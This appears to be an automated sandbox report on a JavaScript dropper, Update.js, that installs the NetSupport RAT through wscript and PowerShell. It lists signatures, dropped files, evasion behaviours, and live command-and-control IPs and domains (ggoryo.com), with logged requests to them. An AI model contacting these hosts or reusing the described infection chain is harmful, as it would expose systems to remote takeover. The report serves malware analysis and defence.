Windows Analysis Report
Update.js

Overview

General Information

Sample name: Update.js
Analysis ID: 1529030
MD5: 01d7daa58e16da2b30ac20fe57081bba
SHA1: 8213900420ed4c22b1e896acb53f99a5989cb2cd
SHA256: a05933c299a81badef96fd575ff0f7d934c3edaf0f7478e897a2299f1ef8f11e
Infos:

Detection

NetSupport RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

AV Detection
barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exe ReversingLabs: Detection: 23%
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary, 10_2_110ADA40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 77.83.199.112:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 77.83.199.112:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2533582731.000000006CCA1000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2538791982.00000000747F2000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 0000000A.00000002.2489223815.0000000000442000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000A.00000000.1514998417.0000000000442000.00000002.00000001.01000000.00000008.sdmp, client32.exe.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2538169520.0000000073A85000.00000002.00000001.01000000.0000000A.sdmp, pcicapi.dll.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle, 10_2_111273E0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 10_2_1102D9F4
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 10_2_1102DD21
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose, 10_2_1110BD70
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA, 10_2_110663B0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError, 10_2_1106ABD0

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.16:49708 -> 5.181.159.137:443
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 77.83.199.112 443 Jump to behavior
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /trade/da.php?9800 HTTP/1.1Host: ggoryo.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.26.1.231 104.26.1.231
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ASN-MOLMoscowRussiaRU ASN-MOLMoscowRussiaRU
Source: Joe Sandbox View ASN Name: MIVOCLOUDMD MIVOCLOUDMD
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /trade/fix.php?6867 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ggoryo.comContent-Length: 7Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 5.181.159.137
Source: unknown TCP traffic detected without corresponding DNS query: 5.181.159.137
Source: unknown TCP traffic detected without corresponding DNS query: 5.181.159.137
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /trade/da.php?9800 HTTP/1.1Host: ggoryo.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: ggoryo.com
Source: global traffic DNS traffic detected: DNS query: geo.netsupportsoftware.com
Source: unknown HTTP traffic detected: POST /trade/fix.php?6867 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ggoryo.comContent-Length: 7Connection: Keep-AliveCache-Control: no-cache
Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr String found in binary or memory: http://%s/fakeurl.htm
Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr String found in binary or memory: http://%s/testpage.htm
Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: client32.exe, client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr String found in binary or memory: http://127.0.0.1
Source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: wscript.exe, 00000000.00000003.1346975876.000001FC5729F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: client32.exe, 0000000A.00000003.1821012459.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1827697976.00000000059EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 0000000A.00000003.1527325191.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1524166542.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1821012459.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1540191948.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.8.dr String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: client32.exe, 0000000A.00000003.1532975213.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1527325191.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1524166542.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1821012459.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1540191948.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspwe
Source: client32.exe, 0000000A.00000003.1532975213.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1527325191.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1524166542.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1821012459.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1540191948.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspws
Source: powershell.exe, 00000008.00000002.1567156116.0000026C01667000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ggoryo.com
Source: powershell.exe, 00000008.00000002.1738259741.0000026C1006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000008.00000002.1567156116.0000026C018BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr String found in binary or memory: http://s2.symcb.com0
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcb.com/sv.crt
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr String found in binary or memory: http://sv.symcd.com0&
Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.1567156116.0000026C018BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(L
Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr String found in binary or memory: http://www.netsupportsoftware.com
Source: client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr String found in binary or memory: http://www.pci.co.uk/support
Source: client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr String found in binary or memory: http://www.symauth.com/cps0(
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr String found in binary or memory: http://www.symauth.com/rpa00
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ggorxo.com/
